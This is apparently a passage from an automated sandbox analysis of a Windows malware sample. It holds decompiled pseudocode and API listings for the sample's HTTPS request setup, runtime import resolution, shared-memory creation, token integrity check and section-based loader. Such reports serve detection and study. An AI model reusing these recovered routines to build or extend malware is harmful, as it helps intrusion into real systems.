					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x22bd238, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x022b7c3d
0x022b7c4f
0x022b7c52
0x022b7c5e
0x022b7c64
0x022b7c69
0x022b7dd0
0x022b7c6f
0x022b7c6f
0x022b7c71
0x022b7c76
0x022b7c77
0x022b7c7d
0x022b7c80
0x022b7c83
0x022b7c91
0x022b7c9c
0x022b7c9f
0x022b7ca1
0x022b7cae
0x022b7cb8
0x022b7cba
0x022b7cbf
0x022b7cc4
0x022b7ccf
0x022b7ccf
0x022b7cc6
0x022b7cc6
0x022b7ccd
0x00000000
0x00000000
0x022b7ccd
0x022b7cd9
0x00000000
0x022b7cdc
0x022b7ce0
0x022b7ceb
0x022b7ceb
0x022b7cf2
0x022b7cfb
0x022b7d02
0x022b7d0b
0x022b7d0e
0x022b7d11
0x022b7d16
0x022b7d1b
0x00000000
0x00000000
0x022b7d1d
0x022b7d20
0x022b7d23
0x022b7d26
0x00000000
0x022b7d28
0x022b7d37
0x022b7d37
0x00000000
0x022b7d65
0x022b7d65
0x022b7d6a
0x022b7d89
0x022b7d8b
0x022b7d90
0x022b7d91
0x00000000
0x022b7d6c
0x022b7d6c
0x022b7d72
0x00000000
0x022b7d74
0x022b7d74
0x022b7d79
0x022b7d7b
0x022b7d80
0x022b7d81
0x022b7d97
0x022b7d97
0x022b7d9f
0x022b7daa
0x022b7dad
0x022b7db8
0x022b7dba
0x022b7dbd
0x022b7dbf
0x00000000
0x022b7dc5
0x00000000
0x022b7dc5
0x022b7dbf
0x022b7d72
0x00000000
0x022b7d6a
0x022b7d3a
0x022b7d3c
0x022b7d3f
0x022b7d40
0x022b7d40
0x022b7d44
0x022b7d4e
0x022b7d4e
0x022b7d54
0x022b7d57
0x022b7d57
0x022b7d5d
0x022b7d5d
0x022b7dda
0x00000000

APIs

memset.NTDLL ref: 022B7C52
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 022B7C5E
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 022B7C83
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 022B7C9F
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 022B7CB8
HeapFree.KERNEL32(00000000,00000000), ref: 022B7D4E
CloseHandle.KERNEL32(?), ref: 022B7D5D
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 022B7D97
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,022B312C,?), ref: 022B7DAD
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 022B7DB8

Part of subcall function 022B5319: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04779368,00000000,?,74E5F710,00000000,74E5F730), ref: 022B5368
Part of subcall function 022B5319: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,047793A0,?,00000000,30314549,00000014,004F0053,0477935C), ref: 022B5405
Part of subcall function 022B5319: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,022B7CCB), ref: 022B5417

GetLastError.KERNEL32 ref: 022B7DCA

Strings

Ut, xrefs: 022B7D4E

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID: Ut
API String ID: 3521023985-8415677
Opcode ID: f764c3117ddcf1b220336c60cf3e96b63639a292ad2fd4d21cf494876b5b30cc
Instruction ID: ef5569f68b2056e97f6cbf1d251b78ad26c94cf23f6e4be129f452d0a4fcd665
Opcode Fuzzy Hash: f764c3117ddcf1b220336c60cf3e96b63639a292ad2fd4d21cf494876b5b30cc
Instruction Fuzzy Hash: 86518E72C1122AAFDF129FD4DC489EEBFB9EF893A0F104A16F510A6184D7709650CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 022BA85C, Relevance: 19.6, APIs: 13, Instructions: 126
networkstringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E022BA85C(void* __eax, void* __ecx, long __esi, char* _a4) {
				void _v8;
				long _v12;
				void _v16;
				void* _t34;
				void* _t38;
				void* _t40;
				char* _t56;
				long _t57;
				void* _t58;
				intOrPtr _t59;
				long _t65;

				_t65 = __esi;
				_t58 = __ecx;
				_v16 = 0xea60;
				__imp__( *(__esi + 4));
				_v12 = __eax + __eax;
				_t56 = E022B1525(__eax + __eax + 1);
				if(_t56 != 0) {
					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
						E022B8B22(_t56);
					} else {
						E022B8B22( *(__esi + 4));
						 *(__esi + 4) = _t56;
					}
				}
				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
				 *(_t65 + 0x10) = _t34;
				if(_t34 == 0 || InternetSetStatusCallback(_t34, E022BA7F1) == 0xffffffff) {
					L15:
					return GetLastError();
				} else {
					ResetEvent( *(_t65 + 0x1c));
					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x1bb, 0, 0, 3, 0, _t65); // executed
					 *(_t65 + 0x14) = _t38;
					if(_t38 != 0 || GetLastError() == 0x3e5 && E022B29C0( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
						_t59 =  *0x22bd2a8; // 0x24ba5a8
						_t15 = _t59 + 0x22be743; // 0x544547
						_v8 = 0x84c03180;
						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84c03180, _t65); // executed
						 *(_t65 + 0x18) = _t40;
						if(_t40 == 0) {
							goto L15;
						}
						_t57 = 4;
						_v12 = _t57;
						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
							_v8 = _v8 | 0x00000100;
							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
						}
						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
							goto L15;
						} else {
							return 0;
						}
					} else {
						goto L15;
					}
				}
			}

0x022ba85c
0x022ba85c
0x022ba867
0x022ba86e
0x022ba876
0x022ba880
0x022ba886
0x022ba899
0x022ba8a9
0x022ba89b
0x022ba89e
0x022ba8a3
0x022ba8a3
0x022ba899
0x022ba8b9
0x022ba8bf
0x022ba8c4
0x022ba9b0
0x00000000
0x022ba8df
0x022ba8e2
0x022ba8f8
0x022ba8fe
0x022ba903
0x022ba92b
0x022ba93e
0x022ba948
0x022ba94b
0x022ba951
0x022ba956
0x00000000
0x00000000
0x022ba95a
0x022ba966
0x022ba977
0x022ba979
0x022ba98a
0x022ba98a
0x022ba99a
0x00000000
0x022ba9ac
0x00000000
0x022ba9ac
0x00000000
0x00000000
0x00000000
0x022ba903

APIs

lstrlen.KERNEL32(?,00000008,74E04D40), ref: 022BA86E

Part of subcall function 022B1525: RtlAllocateHeap.NTDLL(00000000,00000000,022B1278), ref: 022B1531

InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 022BA891
InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 022BA8B9
InternetSetStatusCallback.WININET(00000000,022BA7F1), ref: 022BA8D0
ResetEvent.KERNEL32(?), ref: 022BA8E2
InternetConnectA.WININET(?,?,000001BB,00000000,00000000,00000003,00000000,?), ref: 022BA8F8
GetLastError.KERNEL32 ref: 022BA905
HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84C03180,?), ref: 022BA94B
InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 022BA969
InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 022BA98A
InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 022BA996
InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 022BA9A6
GetLastError.KERNEL32 ref: 022BA9B0

Part of subcall function 022B8B22: RtlFreeHeap.NTDLL(00000000,00000000,022B131A,00000000,?,?,00000000), ref: 022B8B2E

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
String ID:
API String ID: 2290446683-0
Opcode ID: 948f27abbb02936741809f62946203336c014fadfc90f580af5de468ef8175b4
Instruction ID: e10a7e01ede8b418a81e7680ae86f0a499d76cfa5e6cb439dd6c036ed486709c
Opcode Fuzzy Hash: 948f27abbb02936741809f62946203336c014fadfc90f580af5de468ef8175b4
Instruction Fuzzy Hash: 7B419C71950605BFEB329FE1DC88EDB7ABDEF88744B104929F542D1094D731A510DE20

Uniqueness

Uniqueness Score: -1.00%

Function 022BAC95, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209
libraryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E022BAC95(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x22b0000;
				_t115 = _t139[3] + 0x22b0000;
				_t131 = _t139[4] + 0x22b0000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x22b0000;
				_v16 = _t139[5] + 0x22b0000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x22b0002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x22bd1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x22bd1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x22bd1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x22bd19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x22bd1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x22bd198; // 0x0
										 *_t102 = _t125;
										 *0x22bd198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x22bd19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

0x022baca4
0x022bacba
0x022bacc0
0x022bacc2
0x022bacc7
0x022baccd
0x022bacd2
0x022bacd5
0x022bace3
0x022bacea
0x022baced
0x022bacf0
0x022bacf1
0x022bacf4
0x022bacf7
0x022bacfa
0x022bacff
0x022bad0e
0x00000000
0x022bad14
0x022bad1e
0x022bad28
0x022bad2d
0x022bad2f
0x022bad39
0x022bad3c
0x022bad3f
0x022bad45
0x022bad47
0x022bad47
0x022bad4a
0x022bad4d
0x022bad52
0x022bad56
0x022bad69
0x022bad6b
0x022bae13
0x022bae13
0x022bae1a
0x022bae1d
0x022bae27
0x022bae27
0x022bae2b
0x022baea9
0x022baeac
0x022baeae
0x022baeae
0x022baeb5
0x022baeb7
0x022baec1
0x022baec4
0x022baec7
0x022baec7
0x00000000
0x022bae2d
0x022bae30
0x022bae5e
0x022bae68
0x022bae6c
0x022bae74
0x022bae77
0x022bae7e
0x022bae88
0x022bae88
0x022bae8c
0x022bae91
0x022baea0
0x022baea6
0x022baea6
0x022bae8c
0x00000000
0x022bae37
0x022bae3a
0x022bae42
0x022bae57
0x022bae5c
0x00000000
0x00000000
0x022bae5c
0x00000000
0x022bae42
0x022bae30
0x022bae2b
0x022bad71
0x022bad78
0x022bad88
0x022bad8b
0x022bad91
0x022bad95
0x022badd8
0x022bade4
0x022bae0d
0x022bade6
0x022badea
0x022badf0
0x022badf8
0x022badfa
0x022badfd
0x022bae03
0x022bae05
0x022bae05
0x022badf8
0x022badea
0x00000000
0x022bade4
0x022bad9d
0x022bada0
0x022bada7
0x022badb7
0x022badba
0x022badca
0x00000000
0x022badd0
0x022badb1
0x022badb5
0x00000000
0x00000000
0x00000000
0x022badb5
0x022bad82
0x022bad86
0x00000000
0x00000000
0x00000000
0x022bad86
0x022bad5f
0x022bad63
0x00000000
0x00000000
0x00000000

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 022BAD0E
LoadLibraryA.KERNEL32(?), ref: 022BAD8B
GetLastError.KERNEL32 ref: 022BAD97
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 022BADCA

Strings

$, xrefs: 022BACE3

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: $
API String ID: 948315288-3993045852
Opcode ID: 3144815266b793fda642c52d46c06f8f18c0e525ae6c881aa5bc77262e15443b
Instruction ID: bdc72241182bb8936a1af42d0bb4a2daa15a2a7e96cc427fe8c54b147a859b42
Opcode Fuzzy Hash: 3144815266b793fda642c52d46c06f8f18c0e525ae6c881aa5bc77262e15443b
Instruction Fuzzy Hash: 50814A75A50206AFDB22CFD8D884BEEB7F4BF48350F108429E955E7244EB70E945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 022B8E0D, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E022B8E0D(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L022BAF68();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x22bd2a8; // 0x24ba5a8
				_t5 = _t13 + 0x22be87e; // 0x4778e26
				_t6 = _t13 + 0x22be59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L022BAC0A();
				_t17 = CreateFileMappingW(0xffffffff, 0x22bd2ac, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x022b8e0d
0x022b8e15
0x022b8e19
0x022b8e1f
0x022b8e24
0x022b8e29
0x022b8e2c
0x022b8e2f
0x022b8e34
0x022b8e35
0x022b8e38
0x022b8e3d
0x022b8e44
0x022b8e4e
0x022b8e50
0x022b8e51
0x022b8e54
0x022b8e70
0x022b8e76
0x022b8e7a
0x022b8ec8
0x022b8e7c
0x022b8e89
0x022b8e99
0x022b8ea1
0x022b8eb3
0x022b8eb7
0x00000000
0x00000000
0x022b8ea3
0x022b8ea6
0x022b8eab
0x022b8ead
0x022b8ead
0x022b8e8b
0x022b8e8d
0x022b8eb9
0x022b8eba
0x022b8eba
0x022b8e89
0x022b8ecf

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,022B2FFF,?,?,4D283A53,?,?), ref: 022B8E19
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 022B8E2F
_snwprintf.NTDLL ref: 022B8E54
CreateFileMappingW.KERNELBASE(000000FF,022BD2AC,00000004,00000000,00001000,?), ref: 022B8E70
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,022B2FFF,?,?,4D283A53), ref: 022B8E82
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 022B8E99
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,022B2FFF,?,?), ref: 022B8EBA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,022B2FFF,?,?,4D283A53), ref: 022B8EC2

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: c962e639b90d958decb2126f05e305b86d4ce56e5293b3b04b80be0b03573142
Instruction ID: ef968c233dda0f37a26a5b4f5180ea599a76e0f624cd60059b8bceee624aa15e
Opcode Fuzzy Hash: c962e639b90d958decb2126f05e305b86d4ce56e5293b3b04b80be0b03573142
Instruction Fuzzy Hash: F421C0BAE50204BFD713ABE8DC49FDE37A9AF44790F110521F609E6294D7B09504CB51

Uniqueness

Uniqueness Score: -1.00%

Function 022B58DB, Relevance: 12.1, APIs: 8, Instructions: 75
networkCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E022B58DB(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t37;
				void* _t41;
				intOrPtr* _t45;

				_t41 = __edi;
				_t37 = __ebx;
				_t45 = __eax;
				_t16 =  *((intOrPtr*)(__eax + 0x20));
				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
					E022B29C0(_t16, __ecx, 0xea60);
				}
				_t17 =  *(_t45 + 0x18);
				_push(_t37);
				_push(_t41);
				if(_t17 != 0) {
					InternetSetStatusCallback(_t17, 0);
					InternetCloseHandle( *(_t45 + 0x18)); // executed
				}
				_t18 =  *(_t45 + 0x14);
				if(_t18 != 0) {
					InternetSetStatusCallback(_t18, 0);
					InternetCloseHandle( *(_t45 + 0x14));
				}
				_t19 =  *(_t45 + 0x10);
				if(_t19 != 0) {
					InternetSetStatusCallback(_t19, 0);
					InternetCloseHandle( *(_t45 + 0x10));
				}
				_t20 =  *(_t45 + 0x1c);
				if(_t20 != 0) {
					CloseHandle(_t20);
				}
				_t21 =  *(_t45 + 0x20);
				if(_t21 != 0) {
					CloseHandle(_t21);
				}
				_t22 =  *((intOrPtr*)(_t45 + 8));
				if( *((intOrPtr*)(_t45 + 8)) != 0) {
					E022B8B22(_t22);
					 *((intOrPtr*)(_t45 + 8)) = 0;
					 *((intOrPtr*)(_t45 + 0x30)) = 0;
				}
				_t23 =  *((intOrPtr*)(_t45 + 0xc));
				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
					E022B8B22(_t23);
				}
				_t24 =  *_t45;
				if(_t24 != 0) {
					_t24 = E022B8B22(_t24);
				}
				_t46 =  *((intOrPtr*)(_t45 + 4));
				if( *((intOrPtr*)(_t45 + 4)) != 0) {
					return E022B8B22(_t46);
				}
				return _t24;
			}

0x022b58db
0x022b58db
0x022b58dd
0x022b58df
0x022b58e6
0x022b58ed
0x022b58ed
0x022b58f2
0x022b58f5
0x022b58fc
0x022b5905
0x022b5909
0x022b590e
0x022b590e
0x022b5910
0x022b5915
0x022b5919
0x022b591e
0x022b591e
0x022b5920
0x022b5925
0x022b5929
0x022b592e
0x022b592e
0x022b5930
0x022b593b
0x022b593e
0x022b593e
0x022b5940
0x022b5945
0x022b5948
0x022b5948
0x022b594a
0x022b5951
0x022b5954
0x022b5959
0x022b595c
0x022b595c
0x022b595f
0x022b5964
0x022b5967
0x022b5967
0x022b596c
0x022b5970
0x022b5973
0x022b5973
0x022b5978
0x022b597d
0x00000000
0x022b5980
0x022b5987

APIs

InternetSetStatusCallback.WININET(?,00000000), ref: 022B5909
InternetCloseHandle.WININET(?), ref: 022B590E
InternetSetStatusCallback.WININET(?,00000000), ref: 022B5919
InternetCloseHandle.WININET(?), ref: 022B591E
InternetSetStatusCallback.WININET(?,00000000), ref: 022B5929
InternetCloseHandle.WININET(?), ref: 022B592E
CloseHandle.KERNEL32(?,00000000,00000102,?,?,022B93DC,?,?,00000000,00000000,74E481D0), ref: 022B593E
CloseHandle.KERNEL32(?,00000000,00000102,?,?,022B93DC,?,?,00000000,00000000,74E481D0), ref: 022B5948

Part of subcall function 022B29C0: WaitForMultipleObjects.KERNEL32(00000002,022BA923,00000000,022BA923,?,?,?,022BA923,0000EA60), ref: 022B29DB

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
String ID:
API String ID: 2824497044-0
Opcode ID: e7be2ea3d7265fb9929441b00f084e8abd852077a153819119520ed4b193279c
Instruction ID: 5993516b1b311dfa83d40b052c6cd219de925e890faf9ab5020007b2f6ce1504
Opcode Fuzzy Hash: e7be2ea3d7265fb9929441b00f084e8abd852077a153819119520ed4b193279c
Instruction Fuzzy Hash: 68117276620B496BC632AFFAEC84C9BF7EDFF483A43950D18E086D7514C721F8548A60

Uniqueness

Uniqueness Score: -1.00%

Function 022BA2C6, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E022BA2C6(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x22bd25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, ?str?,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E022B1525(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E022B8B22(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x022ba2d3
0x022ba2da
0x022ba2e1
0x022ba2f5
0x022ba300
0x022ba318
0x022ba325
0x022ba328
0x022ba32d
0x022ba338
0x022ba33c
0x022ba34b
0x022ba34f
0x022ba36b
0x022ba36b
0x022ba36f
0x022ba36f
0x022ba374
0x022ba378
0x022ba37e
0x022ba37f
0x022ba386
0x022ba38c

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 022BA2F8
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 022BA318
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 022BA328
CloseHandle.KERNEL32(00000000), ref: 022BA378

Part of subcall function 022B1525: RtlAllocateHeap.NTDLL(00000000,00000000,022B1278), ref: 022B1531

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 022BA34B
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 022BA353
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 022BA363

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 0e0020e9cc12ca1172b4303b591345295197f1c88132d4bb32f211b79b09fbaa
Instruction ID: 2f8282535580927eb7538fd8d4706bba38ea662d77e88c8221692acf618a142d
Opcode Fuzzy Hash: 0e0020e9cc12ca1172b4303b591345295197f1c88132d4bb32f211b79b09fbaa
Instruction Fuzzy Hash: C6215975D00209FFEB029FE4DC88EEEBBB9EF08344F0004A5E910A6260D7719A15EF60

Uniqueness

Uniqueness Score: -1.00%

Function 004002F3, Relevance: 10.1, APIs: 6, Instructions: 1084libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 004016EE: HeapAlloc.KERNEL32(00000000,?,004019CF,00000030,?,00000000), ref: 004016FA

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401DBA,?,?,?,?,?,00000002,?,?), ref: 00401024
GetProcAddress.KERNEL32(00000000,?), ref: 00401046
GetProcAddress.KERNEL32(00000000,?), ref: 0040105C
GetProcAddress.KERNEL32(00000000,?), ref: 00401072
GetProcAddress.KERNEL32(00000000,?), ref: 00401088
GetProcAddress.KERNEL32(00000000,?), ref: 0040109E

Part of subcall function 00401C90: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000,?), ref: 00401CED
Part of subcall function 00401C90: memset.NTDLL ref: 00401D0F

Memory Dump Source

Source File: 00000000.00000002.558314873.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

